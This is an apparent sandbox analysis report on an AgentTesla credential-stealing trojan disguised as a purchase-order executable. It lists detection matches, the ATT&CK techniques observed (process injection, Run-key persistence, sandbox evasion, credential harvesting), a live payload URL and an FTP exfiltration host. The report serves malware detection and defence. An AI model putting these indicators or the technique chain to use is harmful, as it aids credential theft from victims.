                      Source: Yara matchFile source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5996, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7140, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5996, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7140, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      1
                      Exfiltration Over Alternative Protocol
                      Abuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Registry Run Keys / Startup Folder
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      311
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS12
                      Virtualization/Sandbox Evasion
                      Distributed Component Object Model1
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging13
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                      Virtualization/Sandbox Evasion
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                      Process Injection
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527719 Sample: PO_7862679238279-GITTERSTAR... Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 30 ftp.alternatifplastik.com 2->30 32 wymascensores.com 2->32 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 10 other signatures 2->52 7 PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe 16 4 2->7         started        12 Avycqjqvmh.exe 2 2->12         started        14 Avycqjqvmh.exe 14 2 2->14         started        signatures3 process4 dnsIp5 34 wymascensores.com 67.212.175.162, 443, 49730, 49733 SINGLEHOP-LLCUS United States 7->34 24 C:\Users\user\AppData\...\Avycqjqvmh.exe, PE32 7->24 dropped 26 C:\Users\...\Avycqjqvmh.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Injects a PE file into a foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        20 InstallUtil.exe 12->20         started        60 Multi AV Scanner detection for dropped file 14->60 62 Machine Learning detection for dropped file 14->62 22 InstallUtil.exe 2 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49640, 49731 ALASTYRTR Turkey 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->38 40 Tries to steal Mail credentials (via file / registry access) 20->40 42 Tries to harvest and steal ftp login credentials 20->42 44 Tries to harvest and steal browser information (history, passwords, etc) 20->44 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe63%ReversingLabsWin32.Trojan.Znyonm
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe28%VirustotalBrowse
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Avycqjqvmh.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Avycqjqvmh.exe63%ReversingLabsWin32.Trojan.Znyonm
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      wymascensores.com11%VirustotalBrowse
                      ftp.alternatifplastik.com3%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      wymascensores.com
                      67.212.175.162
                      truefalseunknown
                      ftp.alternatifplastik.com
                      5.2.84.236
                      truetrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      https://wymascensores.com/index/Nbyrwv.dattrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://github.com/mgravell/protobuf-netiPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://stackoverflow.com/q/14436606/23354PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://account.dyn.com/PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.com/mgravell/protobuf-netJPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://wymascensores.comPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://stackoverflow.com/q/11564914/23354;PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://stackoverflow.com/q/2152978/23354PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://wymascensores.com/index/Nbyrwv.datxCPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B91000.00000004.00000800.00020000.00000000.sdmptrue
                                  unknown
                                  http://ftp.alternatifplastik.comInstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000332C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000248C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    67.212.175.162
                                    wymascensores.comUnited States
                                    32475SINGLEHOP-LLCUSfalse
                                    5.2.84.236
                                    ftp.alternatifplastik.comTurkey
                                    3188ALASTYRTRtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1527719
                                    Start date and time:2024-10-07 09:12:36 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 465
                                    • Number of non-executed functions: 42
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    TimeTypeDescription
                                    08:13:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Avycqjqvmh C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                    08:13:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Avycqjqvmh C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                                    EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
                                    5.2.84.236PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                      inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                          Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                    Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                      Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        wymascensores.comPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        RFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 67.212.175.162
                                                        Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        ftp.alternatifplastik.comPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        SINGLEHOP-LLCUSsora.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 65.62.1.103
                                                        http://www.edgeupgrade.com/Get hashmaliciousUnknownBrowse
                                                        • 107.6.168.252
                                                        https://hblitigation-news.com/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        https://www.oferdigitaiscom.com/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        RFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        https://novanutrix.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        https://novanutrix.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        yakov.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 198.20.85.251
                                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        ALASTYRTRPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.221
                                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.221
                                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • 5.2.85.36
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0esam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                        • 67.212.175.162
                                                        https://pages.tempisite.com/Meta-businessGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 67.212.175.162
                                                        New order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        http://netflix.dittmedlemskap.com/Get hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        https://pub-2797b14bf0bc475c87995e278c9b8d35.r2.dev/0iu.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 67.212.175.162
                                                        https://steamcommunits.com/tradeoffer/new/partner=1167404782token=DiNTF72WGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                        • 67.212.175.162
                                                        https://clinicafatima.com/NewZealand/auth/login.phpGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 67.212.175.162
                                                        No context
                                                        Process:C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2945024
                                                        Entropy (8bit):5.685544277138753
                                                        Encrypted:false
                                                        SSDEEP:24576:pcid/6VwqvqxO7eeuDy/3gQovH9k+wMANi2Cc0QTDy22k/X37DNO7w6qIGigNKpM:v6owTwRSJXMdSbIl9Lo5qGnzQ9g
                                                        MD5:68B39CED0840D43E3A03E2F92C268C72
                                                        SHA1:9DFB2CE520E0DF7000D2C2A05A012D4446904480
                                                        SHA-256:D96D65AAB0E55FB6E3D470C7DC58C8C6E687C81DF626B60C7461C9349734D240
                                                        SHA-512:6DD61A3E004E75B213B305D62C23189BD7BEBED23A390BBD15AA65E2A2C9B3A23C1FFF14BA0947D8650AF2A76972B4920208D7763C15919406BE41BE52E32958
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 63%
